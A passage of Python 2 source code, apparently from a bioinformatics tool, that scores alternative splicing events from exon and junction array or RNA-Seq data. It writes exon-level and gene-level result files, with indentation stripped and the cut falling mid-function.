try: probeset1 = original_exon_db[probeset1].Probeset()
except Exception: null=[]
else:
probeset1 = probeset1; exons1 = original_exon_db[probeset1].ExonID()
try: selected_probeset = original_exon_db[probeset1].Probeset()
except Exception: selected_probeset = probeset1
else:
try: exons1 = exon_db[probeset1].ExonID()
except Exception:
print probeset1, len(exon_db)
for i in exon_db: print i; break
kill
critical_probeset_list = [selected_probeset]
affygene = entry.GeneID()
### Calculate deviation value for each exon
avg_dI,stdev_dI = gene_deviation_db[affygene]
try: DV = deviation(dI,avg_dI,stdev_dI) ### Note: the dI values are always in log2 space, independent of platform
except Exception: DV = 'NA'
if affygene in annotate_db: description = annotate_db[affygene].Description(); symbol = annotate_db[affygene].Symbol()
else: description = ''; symbol = ''
ped1 = entry.ProbesetExprData1(); adjfold1 = ped1.AdjFold(); exp1 = ped1.BaselineExp(); fold1 = ped1.FoldChange(); rawp1 = ped1.ExpPval()
### Get Constitutive expression values
baseline_const_exp = entry.ConstitutiveExpression() ### For multiple group comparisosn
#if affygene in gene_expression_diff_db: mean_fold_change = gene_expression_diff_db[affygene].ConstitutiveFoldStr()
try: mean_fold_change = str(entry.ConstitutiveFold()) ### For multi-condition analyses, the gene expression is dependent on the conditions compared
except Exception: mean_fold_change = gene_expression_diff_db[affygene].ConstitutiveFoldStr()
if analysis_method == 'ASPIRE' or 'linearregres' in analysis_method:
probeset2 = entry.Probeset2(); exons2 = exon_db[probeset2].ExonID(); rawp1 = str(entry.TTestNormalizedRatios()); rawp2 = str(entry.TTestNormalizedRatios2()); critical_probeset_list.append(probeset2)
ped2 = entry.ProbesetExprData2(); adjfold2 = ped2.AdjFold(); exp2 = ped2.BaselineExp(); fold2 = ped2.FoldChange()
try: location_summary=original_exon_db[selected_probeset].LocationSummary()+'|'+original_exon_db[probeset2].LocationSummary()
except Exception:
try: location_summary=exon_db[selected_probeset].LocationSummary()+'|'+exon_db[probeset2].LocationSummary()
except Exception: location_summary=''
if array_type == 'AltMouse':
extra_transcript_annotation = exon_db[probeset1].GeneStructure()
else:
try: extra_exon_annotation = last_exon_region_db[affygene]
except KeyError: extra_exon_annotation = ''
try:
tc1 = original_exon_db[probeset1].SecondaryGeneID()
tc2 = original_exon_db[probeset2].SecondaryGeneID() ### Transcript Cluster
probeset_tc = makeUnique([tc1,tc2])
extra_transcript_annotation = string.join(probeset_tc,'|')
try: alternatively_reg_tc[affygene] += probeset_tc
except KeyError: alternatively_reg_tc[affygene] = probeset_tc
except Exception: extra_transcript_annotation=''
if array_type == 'RNASeq':
try: extra_transcript_annotation = entry.NovelEvent() ### Instead of secondary gene ID, list known vs. novel reciprocal junction annotation
except Exception: None
exp_list = [float(exp1),float(exp2),float(exp1)+float(fold1),float(exp2)+float(fold2)]; exp_list.sort(); exp_list.reverse()
probeset_tuple = (probeset1,probeset2)
else:
try: exp_list = [float(exp1),float(exp1)+float(fold1)]; exp_list.sort(); exp_list.reverse()
except Exception: exp_list = ['']
probeset_tuple = (probeset1)
highest_exp = exp_list[0]
###Use permuted p-value or lowest expression junction p-value based on the situtation
###This p-value is used to filter out aspire events for further analyses
if len(p_value_call)>0:
if probeset_tuple in permute_p_values:
lowest_raw_p, pos_permute, total_permute, false_pos = permute_p_values[probeset_tuple]
else: lowest_raw_p = "NA"; pos_permute = "NA"; total_permute = "NA"; false_pos = "NA"
else:
if analysis_method == 'ASPIRE' or 'linearregres' in analysis_method: raw_p_list = [entry.TTestNormalizedRatios(),entry.TTestNormalizedRatios2()] #raw_p_list = [float(rawp1),float(rawp2)]; raw_p_list.sort()
else:
try: raw_p_list = [float(entry.TTestNormalizedRatios())] ###Could also be rawp1, but this is more appropriate
except Exception: raw_p_list = [1] ### Occurs when p='NA'
raw_p_list.sort()
lowest_raw_p = raw_p_list[0]; pos_permute = "NA"; total_permute = "NA"; false_pos = "NA"
if perform_permutation_analysis == 'yes':
p_value_extra = str(pos_permute)+' out of '+str(total_permute)
else: p_value_extra = str(pos_permute)
up_exons = ''; down_exons = ''; up_exon_list = []; down_exon_list = []; gene_exon_list=[]
exon_data = critical_exon_list
variable = exon_data[0]
if variable == 1 and regulation_call == 'upregulated':
for exon in exon_data[1]:
up_exons = up_exons + exon + ',';up_exon_list.append(exon)
key = affygene,exon+'|'; gene_exon_list.append(key)
elif variable == 1 and regulation_call == 'downregulated':
for exon in exon_data[1]:
down_exons = down_exons + exon + ',';down_exon_list.append(exon)
key = affygene,exon+'|';gene_exon_list.append(key)
else:
try: exon1 = exon_data[1][0]; exon2 = exon_data[1][1]
except Exception: print exon_data;kill
if adjfold1 > 0:
up_exons = up_exons + exon1 + ',';down_exons = down_exons + exon2 + ','
up_exon_list.append(exon1); down_exon_list.append(exon2)
key = affygene,exon1+'|'; gene_exon_list.append(key);key = affygene,exon2+'|'; gene_exon_list.append(key)
else:
up_exons = up_exons + exon2 + ',';down_exons = down_exons + exon1 + ','
up_exon_list.append(exon2); down_exon_list.append(exon1)
key = affygene,exon1+'|'; gene_exon_list.append(key); key = affygene,exon2+'|'; gene_exon_list.append(key)
up_exons = up_exons[0:-1];down_exons = down_exons[0:-1]
try: ### Get comparisons group annotation data for multigroup comparison analyses
if original_conditions>2:
try: regulation_call = ped1.Annotation()
except Exception: null=[]
except Exception: null=[]
###Format functional results based on exon level fold change
null = []
#global a; a = exon_hits; global b; b=microRNA_attribute_db; kill
"""if 'G7100684@J934332_RC@j_at' in critical_probeset_list:
print probeset1, probeset2, gene, critical_probeset_list, 'blah'
if ('G7100684', ('G7100684@J934333_RC@j_at', 'G7100684@J934332_RC@j_at')) in functional_attribute_db:
print functional_attribute_db[('G7100684', ('G7100684@J934333_RC@j_at', 'G7100684@J934332_RC@j_at'))];blah
blah"""
new_functional_attribute_str, functional_attribute_list2, seq_attribute_str,protein_length_list = format_exon_functional_attributes(affygene,critical_probeset_list,functional_attribute_db,up_exon_list,down_exon_list,protein_length_list)
new_uniprot_exon_feature_str, uniprot_exon_feature_list, null, null = format_exon_functional_attributes(affygene,critical_probeset_list,protein_exon_feature_db,up_exon_list,down_exon_list,null)
null, microRNA_exon_feature_list, null, null = format_exon_functional_attributes(affygene,critical_probeset_list,microRNA_attribute_db,up_exon_list,down_exon_list,null)
if len(new_functional_attribute_str) == 0: new_functional_attribute_str = ' '
if len(new_uniprot_exon_feature_str) == 0: new_uniprot_exon_feature_str = ' '
if len(seq_attribute_str) > 12000: seq_attribute_str = 'The sequence is too long to report for spreadsheet analysis'
### Add entries to a database to quantify the number of reciprocal isoforms regulated
reciprocal_isoform_data = [len(critical_exon_list[1]),critical_exon_list[1],event_call,regulation_call]
try: float((lowest_raw_p))
except ValueError: lowest_raw_p=0
if (float((lowest_raw_p))<=p_threshold or false_pos < 2) or lowest_raw_p == 1 or lowest_raw_p == 'NA':
try: unique_exon_event_db[affygene].append(reciprocal_isoform_data)
except KeyError: unique_exon_event_db[affygene] = [reciprocal_isoform_data]
### Add functional attribute information to a new database
for item in uniprot_exon_feature_list:
attribute = item[0]
exon = item[1]
if (float((lowest_raw_p))<=p_threshold or false_pos < 2) or lowest_raw_p == 1 or lowest_raw_p == 'NA':
try: protein_exon_feature_db2[affygene,attribute].append(exon)
except KeyError: protein_exon_feature_db2[affygene,attribute]=[exon]
### Add functional attribute information to a new database
"""Database not used for exon/junction data export but for over-representation analysis (direction specific)"""
for item in microRNA_exon_feature_list:
attribute = item[0]
exon = item[1]
if (float((lowest_raw_p))<=p_threshold or false_pos < 2) or lowest_raw_p == 1 or lowest_raw_p == 'NA':
try: microRNA_exon_feature_db2[affygene,attribute].append(exon)
except KeyError: microRNA_exon_feature_db2[affygene,attribute]=[exon]
### Add functional attribute information to a new database
for item in functional_attribute_list2:
attribute = item[0]
exon = item[1]
if (float((lowest_raw_p))<=p_threshold or false_pos < 2) or lowest_raw_p == 1 or lowest_raw_p == 'NA':
try: functional_attribute_db2[affygene,attribute].append(exon)
except KeyError: functional_attribute_db2[affygene,attribute]=[exon]
try:
abs_fold = abs(float(mean_fold_change)); fold_direction = 'down'; fold1_direction = 'down'; fold2_direction = 'down'
large_splicing_diff1 = 0; large_splicing_diff2 = 0; large_splicing_diff = 'null'; opposite_splicing_pattern = 'no'
if float(mean_fold_change)>0: fold_direction = 'up'
if float(fold1)>0: fold1_direction = 'up'
if fold1_direction != fold_direction:
if float(fold1)>float(mean_fold_change): large_splicing_diff1 = float(fold1)-float(mean_fold_change)
except Exception:
fold_direction = ''; large_splicing_diff = ''; opposite_splicing_pattern = ''
if analysis_method != 'ASPIRE' and 'linearregres' not in analysis_method: ed = exon_db[probeset1]
else:
try: ed = critical_probeset_annotation_db[selected_probeset,probeset2]
except KeyError:
try: ed = exon_db[selected_probeset] ###not useful data here, but the objects need to exist
except IOError: ed = original_exon_db[probeset1]
ucsc_splice_annotations = ["retainedIntron","cassetteExon","strangeSplice","altFivePrime","altThreePrime","altPromoter","bleedingExon"]
custom_annotations = ["alt-3'","alt-5'","alt-C-term","alt-N-term","cassette-exon","cassette-exon","exon-region-exclusion","intron-retention","mutually-exclusive-exon","trans-splicing"]
custom_exon_annotations_found='no'; ucsc_annotations_found = 'no'; exon_annot_score=0
if len(ed.SplicingEvent())>0:
for annotation in ucsc_splice_annotations:
if annotation in ed.SplicingEvent(): ucsc_annotations_found = 'yes'
for annotation in custom_annotations:
if annotation in ed.SplicingEvent(): custom_exon_annotations_found = 'yes'
if custom_exon_annotations_found == 'yes' and ucsc_annotations_found == 'no': exon_annot_score = 3
elif ucsc_annotations_found == 'yes' and custom_exon_annotations_found == 'no': exon_annot_score = 4
elif ucsc_annotations_found == 'yes' and custom_exon_annotations_found == 'yes': exon_annot_score = 5
else: exon_annot_score = 2
try: gene_splice_event_score[affygene].append(exon_annot_score) ###store for gene level results
except KeyError: gene_splice_event_score[affygene] = [exon_annot_score]
try: gene_exon_region[affygene].append(ed.ExonRegionID()) ###store for gene level results
except KeyError: gene_exon_region[affygene] = [ed.ExonRegionID()]
if analysis_method == 'ASPIRE' or 'linearregres' in analysis_method:
if float(fold2)>0: fold2_direction = 'up'
if fold2_direction != fold_direction:
if float(fold2)>float(mean_fold_change):
large_splicing_diff2 = float(fold2)-float(mean_fold_change)
if abs(large_splicing_diff2) > large_splicing_diff1: large_splicing_diff = str(large_splicing_diff2)
else: large_splicing_diff = str(large_splicing_diff1)
if fold1_direction != fold2_direction and abs(float(fold1))>0.4 and abs(float(fold2))>0.4 and abs(float(mean_fold_change))< max([float(fold2),float(fold1)]):
opposite_splicing_pattern = 'yes'
### Annotate splicing events based on exon_strucuture data
if array_type == 'AltMouse':
extra_exon_annotation = ExonAnnotate_module.annotate_splice_event(exons1,exons2,extra_transcript_annotation)
try: splice_event_db[extra_exon_annotation] += 1
except KeyError: splice_event_db[extra_exon_annotation] = 1
try:
direct_domain_alignments = probeset_aligning_db[selected_probeset,probeset2]
try: direct_domain_gene_alignments[affygene]+=', '+direct_domain_alignments
except KeyError: direct_domain_gene_alignments[affygene]=direct_domain_alignments
except KeyError: direct_domain_alignments = ' '
splicing_event = ed.SplicingEvent()
if array_type == 'RNASeq':
splicing_event = checkForTransSplicing(probeset1_display,splicing_event)
splicing_event = checkForTransSplicing(probeset2,splicing_event)
exp1 = covertLogExpressionToNonLog(exp1)
exp2 = covertLogExpressionToNonLog(exp2)
baseline_const_exp = covertLogExpressionToNonLog(baseline_const_exp)
fold1 = covertLogFoldToNonLog(fold1)
fold2 = covertLogFoldToNonLog(fold2)
adjfold1 = covertLogFoldToNonLog(adjfold1)
adjfold2 = covertLogFoldToNonLog(adjfold2)
mean_fold_change = covertLogFoldToNonLog(mean_fold_change)
### Annotate splicing events based on pre-computed and existing annotations
values= [affygene,dI,symbol,fs(description),exons1,exons2,regulation_call,event_call,probeset1_display,rawp1,probeset2,rawp2,fold1,fold2,adjfold1,adjfold2]
values+=[extra_transcript_annotation,up_exons,down_exons,fs(new_functional_attribute_str),fs(new_uniprot_exon_feature_str),fs(seq_attribute_str),exp1,exp2,fs(direct_domain_alignments)]
values+=[str(baseline_const_exp),str(lowest_raw_p),p_value_extra,str(false_pos),mean_fold_change,extra_exon_annotation]
values+=[ed.ExternalExonIDs(),ed.ExonRegionID(),splicing_event,str(exon_annot_score),large_splicing_diff,location_summary]
exon_sets = abs(float(dI)),regulation_call,event_call,exons1,exons2,''
### Export significant reciprocol junction pairs and scores
values_ps = [probeset1+'|'+probeset2,affygene,'changed',dI,'NA',str(lowest_raw_p)]; values_ps = string.join(values_ps,'\t')+'\n'
try: ProcessedSpliceData_data.write(values_ps)
except Exception: None
values_ge = [affygene,'En',dI,str(lowest_raw_p),symbol,probeset1_display+' | '+probeset2]; values_ge = string.join(values_ge,'\t')+'\n'
if array_type == 'junction' or array_type == 'RNASeq': ### Only applies to reciprocal junction sensitive platforms (but not currently AltMouse)
goelite_data.write(values_ge)
if array_type == 'junction' or array_type == 'RNASeq': ### Only applies to reciprocal junction sensitive platforms (but not currently AltMouse)
try: exon_probeset = exon_array_translation_db[affygene+':'+exon_data[1][0]][0]; probeset1 = exon_probeset; gcn+=1
except Exception: probeset1 = None #probeset1 = affygene+':'+exon_data[1][0]
try:
null = int(probeset1) ### Must be an int to work in DomainGraph
values_dg = [probeset1,affygene,'changed',dI,'NA',str(lowest_raw_p)]; values_dg = string.join(values_dg,'\t')+'\n'
if array_type == 'junction' or array_type == 'RNASeq':
DG_data.write(values_dg)
values_srf = string.join([probeset1,'Ae',dI,str(lowest_raw_p)],'\t')+'\n'
if float(dI)>0:
SRFinder_ex_data.write(values_srf)
elif float(dI)<0:
SRFinder_in_data.write(values_srf)
except Exception: null=[]
else:
si_pvalue = lowest_raw_p
if si_pvalue == 1: si_pvalue = 'NA'
if probeset1 in midas_db:
midas_p = str(midas_db[probeset1])
if float(midas_p)<lowest_raw_p: lowest_raw_p = float(midas_p) ###This is the lowest and SI-pvalue
else: midas_p = ''
###Determine what type of exon-annotations are present to assign a confidence score
if affygene in annotate_db: ###Determine the transcript clusters used to comprise a splice event (genes and exon specific)
try:
gene_tc = annotate_db[affygene].TranscriptClusterIDs()
try: probeset_tc = [ed.SecondaryGeneID()]
except Exception: probeset_tc = [affygene]
for transcript_cluster in gene_tc: probeset_tc.append(transcript_cluster)
probeset_tc = makeUnique(probeset_tc)
except Exception: probeset_tc = ''; gene_tc=''
else:
try:
try: probeset_tc = [ed.SecondaryGeneID()]
except Exception: probeset_tc = [affygene]
probeset_tc = makeUnique(probeset_tc)
except Exception: probeset_tc = ''; gene_tc=''
cluster_number = len(probeset_tc)
try: alternatively_reg_tc[affygene] += probeset_tc
except KeyError: alternatively_reg_tc[affygene] = probeset_tc
try: last_exon_region = last_exon_region_db[affygene]
except KeyError: last_exon_region = ''
if cluster_number>1: exon_annot_score = 1
direct_domain_alignments = ' '
if array_type == 'exon' or array_type == 'gene' or explicit_data_type != 'null':
try:
direct_domain_alignments = probeset_aligning_db[probeset1]
try: direct_domain_gene_alignments[affygene]+=', '+direct_domain_alignments
except KeyError: direct_domain_gene_alignments[affygene]=direct_domain_alignments
except KeyError: direct_domain_alignments = ' '
else:
try: direct_domain_alignments = probeset_aligning_db[affygene+':'+exons1]
except KeyError: direct_domain_alignments = ''
if array_type == 'RNASeq':
exp1 = covertLogExpressionToNonLog(exp1)
baseline_const_exp = covertLogExpressionToNonLog(baseline_const_exp)
fold1 = covertLogFoldToNonLog(fold1)
adjfold1 = covertLogFoldToNonLog(adjfold1)
mean_fold_change = covertLogFoldToNonLog(mean_fold_change)
try: adj_SIp=fdr_exon_stats[probeset1].AdjP()
except Exception: adj_SIp = 'NA'
try: secondary_geneid = ed.SecondaryGeneID()
except Exception: secondary_geneid = affygene
if array_type == 'RNASeq':
secondary_geneid = ed.NovelExon()
### Write Splicing Index results
values= [affygene,dI,symbol,fs(description),exons1,regulation_call,probeset1,rawp1,str(lowest_raw_p),midas_p,fold1,adjfold1]
values+=[up_exons,down_exons,fs(new_functional_attribute_str),fs(new_uniprot_exon_feature_str),fs(seq_attribute_str),fs(direct_domain_alignments),exp1]
values+=[str(baseline_const_exp),str(si_pvalue),DV,mean_fold_change,secondary_geneid, ed.ExternalExonIDs()]
values+=[ed.Constitutive(),ed.ExonRegionID(),ed.SplicingEvent(),last_exon_region,ed.LocationSummary()] #str(exon_annot_score)
if probeset1 in filtered_probeset_db: values += filtered_probeset_db[probeset1]
exon_sets = abs(float(dI)),regulation_call,event_call,exons1,exons1,midas_p
probeset = probeset1 ### store original ID (gets converted below)
### Write DomainGraph results
try: midas_p = str(midas_db[probeset1])
except KeyError: midas_p = 'NA'
### Export significant exon/junction IDs and scores
values_ps = [probeset1,affygene,'changed',dI,'NA',str(lowest_raw_p)]; values_ps = string.join(values_ps,'\t')+'\n'
try: ProcessedSpliceData_data.write(values_ps)
except Exception: None
if array_type == 'gene' or array_type == 'junction' or array_type == 'RNASeq':
if (array_type == 'junction' or array_type == 'RNASeq') and explicit_data_type == 'null':
try: exon_probeset = exon_array_translation_db[affygene+':'+exon_data[1][0]][0]; probeset1 = exon_probeset; gcn+=1
except Exception: probeset1 = None ### don't write out a line
else:
try: exon_probeset = exon_array_translation_db[probeset1][0]; probeset1 = exon_probeset; gcn+=1
except Exception: probeset1=None; #null=[]; #print gcn, probeset1;kill - force an error - new in version 2.0.8
try:
null = int(probeset1)
values_dg = [probeset1,affygene,'changed',dI,str(si_pvalue),midas_p]; values_dg = string.join(values_dg,'\t')+'\n'
DG_data.write(values_dg)
values_srf = string.join([probeset1,'Ae',dI,str(lowest_raw_p)],'\t')+'\n'
if float(dI)>0:
SRFinder_ex_data.write(values_srf)
elif float(dI)<0:
SRFinder_in_data.write(values_srf)
except Exception: null=[]
values_ge = [affygene,'En',dI,str(si_pvalue),midas_p,symbol,probeset]; values_ge = string.join(values_ge,'\t')+'\n'
goelite_data.write(values_ge)
if len(ed.SplicingEvent())>2:
try: external_exon_annot[affygene].append(ed.SplicingEvent())
except KeyError: external_exon_annot[affygene] = [ed.SplicingEvent()]
try: values = string.join(values,'\t')+'\n'
except Exception: print values;kill
data.write(values)
###Process data for gene level reports
if float((lowest_raw_p))<=p_threshold or false_pos < 2 or lowest_raw_p == 1:
try: comparison_count[affygene] += 1
except KeyError: comparison_count[affygene] = 1
try: aspire_gene_results[affygene].append(exon_sets)
except KeyError: aspire_gene_results[affygene] = [exon_sets]
for exon in up_exon_list:
exon_info = exon,'upregulated'
try: critical_gene_exons[affygene].append(exon_info)
except KeyError: critical_gene_exons[affygene] = [exon_info]
for exon in down_exon_list:
exon_info = exon,'downregulated'
try: critical_gene_exons[affygene].append(exon_info)
except KeyError: critical_gene_exons[affygene] = [exon_info]
data.close()
print event_count, analysis_method, "results written to:", aspire_output,'\n'
try: clearObjectsFromMemory(original_exon_db)
except Exception: null=[]
exon_array_translation_db=[]; original_exon_db=[]; probeset_to_gene=[]
### Finish writing the DomainGraph export file with non-significant probesets
if array_type != 'AltMouse':
for probeset in excluded_probeset_db:
eed = excluded_probeset_db[probeset]
try: midas_p = str(midas_db[probeset])
except KeyError: midas_p = 'NA'
### Export significant exon/junction IDs and scores
try: values_ps = [probeset,eed.GeneID(),'UC',eed.Score(),str(eed.TTestNormalizedRatios()),midas_p]
except Exception: excl_probeset, geneid, score, rawp, pvalue = eed; values_ps = [probeset,geneid,'UC', str(score), str(rawp), str(pvalue)]
values_ps = string.join(values_ps,'\t')+'\n'; ProcessedSpliceData_data.write(values_ps)
### Write DomainGraph results
if array_type == 'gene' or array_type == 'junction' or array_type == 'RNASeq':
try: exon_probeset = exon_array_translation_db[probeset][0]; probeset = exon_probeset; gcn+=1
except Exception: probeset=None; # null=[] - force an error - new in version 2.0.8
try: values_dg = [probeset,eed.GeneID(),'UC',eed.Score(),str(eed.TTestNormalizedRatios()),midas_p]
except Exception:
try:
excl_probeset, geneid, score, rawp, pvalue = eed
if ':' in probeset: probeset = excl_probeset ### Example: ENSMUSG00000029213:E2.1, make this just the numeric exclusion probeset - Not sure if DG handles non-numeric
values_dg = [probeset,geneid,'UC', str(score), str(rawp), str(pvalue)]
except Exception: None
try:
null=int(probeset)
values_dg = string.join(values_dg,'\t')+'\n'; DG_data.write(values_dg)
except Exception: null=[]
if array_type == 'gene' or array_type == 'junction' or array_type == 'RNASeq':
for id in exon_array_translation_db:
SRFinder_denom_data.write(exon_array_translation_db[id]+'\tAe\n')
else:
for probeset in original_exon_db:
SRFinder_denom_data.write(probeset+'\tAe\n')
DG_data.close()
SRFinder_in_data.close()
SRFinder_ex_data.close()
SRFinder_denom_data.close()
for affygene in direct_domain_gene_alignments:
domains = string.split(direct_domain_gene_alignments[affygene],', ')
domains = unique.unique(domains); domains = string.join(domains,', ')
direct_domain_gene_alignments[affygene] = domains
### functional_attribute_db2 will be reorganized so save the database with another. Use this
functional_attribute_db = functional_attribute_db2
functional_attribute_db2 = reorganize_attribute_entries(functional_attribute_db2,'no')
external_exon_annot = eliminate_redundant_dict_values(external_exon_annot)
protein_exon_feature_db = protein_exon_feature_db2
protein_exon_feature_db2 = reorganize_attribute_entries(protein_exon_feature_db2,'no')
############ Export Gene Data ############
up_splice_val_genes = 0; down_dI_genes = 0; diff_exp_spliced_genes = 0; diff_spliced_rna_factor = 0
ddI = 0; udI = 0
summary_data_db['direct_domain_genes']=len(direct_domain_gene_alignments)
summary_data_db['alt_genes']=len(aspire_gene_results)
critical_gene_exons = eliminate_redundant_dict_values(critical_gene_exons)
aspire_output_gene = root_dir+'AltResults/AlternativeOutput/' + dataset_name + analysis_method + '-exon-inclusion-GENE-results.txt'
data = export.ExportFile(aspire_output_gene)
if array_type == 'AltMouse': goelite_data.write("GeneID\tSystemCode\n")
title = ['AffyGene','max_dI','midas-p (corresponding)','symbol','external gene ID','description','regulation_call','event_call']
title +=['number_of_comparisons','num_effected_exons','up_exons','down_exons','functional_attribute','uniprot-ens_exon_features','direct_domain_alignments']
title +=['pathways','mean_fold_change','exon-annotations','exon-region IDs','alternative gene ID','splice-annotation score']
title = string.join(title,'\t')+'\n'
data.write(title)
for affygene in aspire_gene_results:
if affygene in annotate_db:
description = annotate_db[affygene].Description()
symbol = annotate_db[affygene].Symbol()
ensembl = annotate_db[affygene].ExternalGeneID()
if array_type != 'AltMouse' and array_type != 'RNASeq': transcript_clusters = alternatively_reg_tc[affygene]; transcript_clusters = makeUnique(transcript_clusters); transcript_clusters = string.join(transcript_clusters,'|')
else: transcript_clusters = affygene
rna_processing_factor = annotate_db[affygene].RNAProcessing()
else: description='';symbol='';ensembl=affygene;rna_processing_factor=''; transcript_clusters=''
if ensembl in go_annotations: wpgo = go_annotations[ensembl]; goa = wpgo.Combined()
else: goa = ''
if array_type == 'AltMouse':
if len(ensembl) >0: goelite_data.write(ensembl+'\tL\n')
try: gene_splice_event_score[affygene].sort(); top_se_score = str(gene_splice_event_score[affygene][-1])
except KeyError: top_se_score = 'NA'
try: gene_regions = gene_exon_region[affygene]; gene_regions = makeUnique(gene_regions); gene_regions = string.join(gene_regions,'|')
except KeyError: gene_regions = 'NA'
if analysis_method == 'ASPIRE' or analysis_method == 'linearregres': number_of_comparisons = str(comparison_count[affygene])
else: number_of_comparisons = 'NA'
results_list = aspire_gene_results[affygene]
results_list.sort(); results_list.reverse()
max_dI = str(results_list[0][0])
regulation_call = results_list[0][1]
event_call = results_list[0][2]
midas_p = results_list[0][-1]
num_critical_exons = str(len(critical_gene_exons[affygene]))
try: direct_domain_annots = direct_domain_gene_alignments[affygene]
except KeyError: direct_domain_annots = ' '
down_exons = ''; up_exons = ''; down_list=[]; up_list=[]
for exon_info in critical_gene_exons[affygene]:
exon = exon_info[0]; call = exon_info[1]
if call == 'downregulated':
down_exons = down_exons + exon + ','
down_list.append(exon)
ddI += 1
if call == 'upregulated':
up_exons = up_exons + exon + ','
up_list.append(exon)
udI += 1
down_exons = down_exons[0:-1]
up_exons = up_exons[0:-1]
up_exons = add_a_space(up_exons); down_exons = add_a_space(down_exons)
functional_annotation =''
if affygene in functional_attribute_db2:
number_of_functional_attributes = str(len(functional_attribute_db2[affygene]))
attribute_list = functional_attribute_db2[affygene]
attribute_list.sort()
for attribute_exon_info in attribute_list:
exon_attribute = attribute_exon_info[0]
exon_list = attribute_exon_info[1]
functional_annotation = functional_annotation + exon_attribute
exons = '('
for exon in exon_list: exons = exons + exon + ','
exons = exons[0:-1] + '),'
if add_exons_to_annotations == 'yes': functional_annotation = functional_annotation + exons
else: functional_annotation = functional_annotation + ','
functional_annotation = functional_annotation[0:-1]
uniprot_exon_annotation = ''
if affygene in protein_exon_feature_db2:
number_of_functional_attributes = str(len(protein_exon_feature_db2[affygene]))
attribute_list = protein_exon_feature_db2[affygene]; attribute_list.sort()
for attribute_exon_info in attribute_list:
exon_attribute = attribute_exon_info[0]
exon_list = attribute_exon_info[1]
uniprot_exon_annotation = uniprot_exon_annotation + exon_attribute
exons = '('
for exon in exon_list: exons = exons + exon + ','
exons = exons[0:-1] + '),'
if add_exons_to_annotations == 'yes': uniprot_exon_annotation = uniprot_exon_annotation + exons
else: uniprot_exon_annotation = uniprot_exon_annotation + ','
uniprot_exon_annotation = uniprot_exon_annotation[0:-1]
if len(uniprot_exon_annotation) == 0: uniprot_exon_annotation = ' '
if len(functional_annotation) == 0: functional_annotation = ' '
if affygene in gene_expression_diff_db:
mean_fold_change = gene_expression_diff_db[affygene].ConstitutiveFoldStr()
try:
if abs(float(mean_fold_change)) > log_fold_cutoff: diff_exp_spliced_genes += 1
except Exception: diff_exp_spliced_genes = diff_exp_spliced_genes
else: mean_fold_change = 'NC'
if len(rna_processing_factor) > 2: diff_spliced_rna_factor +=1
###Add annotations for where in the gene structure these exons are (according to Ensembl)
if affygene in external_exon_annot: external_gene_annot = string.join(external_exon_annot[affygene],', ')
else: external_gene_annot = ''
if array_type == 'RNASeq':
mean_fold_change = covertLogFoldToNonLog(mean_fold_change)
values =[affygene,max_dI,midas_p,symbol,ensembl,fs(description),regulation_call,event_call,number_of_comparisons]
values+=[num_critical_exons,up_exons,down_exons,functional_annotation]
values+=[fs(uniprot_exon_annotation),fs(direct_domain_annots),fs(goa),mean_fold_change,external_gene_annot,gene_regions,transcript_clusters,top_se_score]
values = string.join(values,'\t')+'\n'
data.write(values)
### Use results for summary statistics
if len(up_list)>len(down_list): up_splice_val_genes +=1
else: down_dI_genes +=1
data.close()
print "Gene-level results written"
###yes here indicates that although the truncation events will initially be filtered out, later they will be added
###back in without the non-truncation annotations....if there is no second database (in this case functional_attribute_db again)
###IF WE WANT TO FILTER OUT NON-NMD ENTRIES WHEN NMD IS PRESENT (FOR A GENE) MUST INCLUDE functional_attribute_db AS THE SECOND VARIABLE!!!!
###Currently, yes does nothing
functional_annotation_db, null = grab_summary_dataset_annotations(functional_attribute_db,'','yes')
upregulated_genes = 0; downregulated_genes = 0
###Calculate the number of upregulated and downregulated genes
for affygene in gene_expression_diff_db:
fold_val = gene_expression_diff_db[affygene].ConstitutiveFold()
try:
if float(fold_val) > log_fold_cutoff: upregulated_genes += 1
elif abs(float(fold_val)) > log_fold_cutoff: downregulated_genes += 1
except Exception: null=[]
upregulated_rna_factor = 0; downregulated_rna_factor = 0
###Calculate the total number of putative RNA-processing/binding factors differentially regulated
for affygene in gene_expression_diff_db:
gene_fold = gene_expression_diff_db[affygene].ConstitutiveFold()
rna_processing_factor = gene_expression_diff_db[affygene].RNAProcessing()
if len(rna_processing_factor) > 1:
if gene_fold>log_fold_cutoff: upregulated_rna_factor += 1
elif abs(gene_fold)>log_fold_cutoff: downregulated_rna_factor += 1
###Generate three files for downstream functional summary
### functional_annotation_db2 is output to the same function as functional_annotation_db, ranked_uniprot_list_all to get all ranked uniprot annotations,
### and ranked_uniprot_list_coding_only to get only coding ranked uniprot annotations
functional_annotation_db2, ranked_uniprot_list_all = grab_summary_dataset_annotations(protein_exon_feature_db,'','') #functional_attribute_db
null, ranked_uniprot_list_coding_only = grab_summary_dataset_annotations(protein_exon_feature_db,functional_attribute_db,'') #functional_attribute_db
functional_attribute_db=[]; protein_exon_feature_db=[]
###Sumarize changes in avg protein length for each splice event
up_protein_list=[];down_protein_list=[]; protein_length_fold_diff=[]
for [down_protein,up_protein] in protein_length_list:
up_protein = float(up_protein); down_protein = float(down_protein)
down_protein_list.append(down_protein); up_protein_list.append(up_protein)
if up_protein > 10 and down_protein > 10:
fold_change = up_protein/down_protein; protein_length_fold_diff.append(fold_change)
median_fold_diff = statistics.median(protein_length_fold_diff)
try: down_avg=int(statistics.avg(down_protein_list)); up_avg=int(statistics.avg(up_protein_list))
except Exception: down_avg=0; up_avg=0
try:
try:
down_std=int(statistics.stdev(down_protein_list)); up_std=int(statistics.stdev(up_protein_list))
except ValueError: ###If 'null' is returned fro stdev
down_std = 0;up_std = 0
except Exception:
down_std = 0;up_std = 0
if len(down_protein_list)>1 and len(up_protein_list)>1:
try:
#t,df,tails = statistics.ttest(down_protein_list,up_protein_list,2,3)
#t = abs(t);df = round(df)
#print 'ttest t:',t,'df:',df
#p = str(statistics.t_probability(t,df))
p = str(statistics.runComparisonStatistic(down_protein_list,up_protein_list,probability_statistic))
#print dataset_name,p
except Exception: p = 'NA'
if p == 1: p = 'NA'
else: p = 'NA'
###Calculate unique reciprocal isoforms for exon-inclusion, exclusion and mutual-exclusive events
unique_exon_inclusion_count=0;unique_exon_exclusion_count=0;unique_mutual_exclusive_count=0;
unique_exon_event_db = eliminate_redundant_dict_values(unique_exon_event_db)
for affygene in unique_exon_event_db:
isoform_entries = unique_exon_event_db[affygene]
possibly_redundant=[]; non_redundant=[]; check_for_redundant=[]
for entry in isoform_entries:
if entry[0] == 1: ### If there is only one regulated exon
possibly_redundant.append(entry)
else:
non_redundant.append(entry)
critical_exon_list = entry[1]
for exon in critical_exon_list:
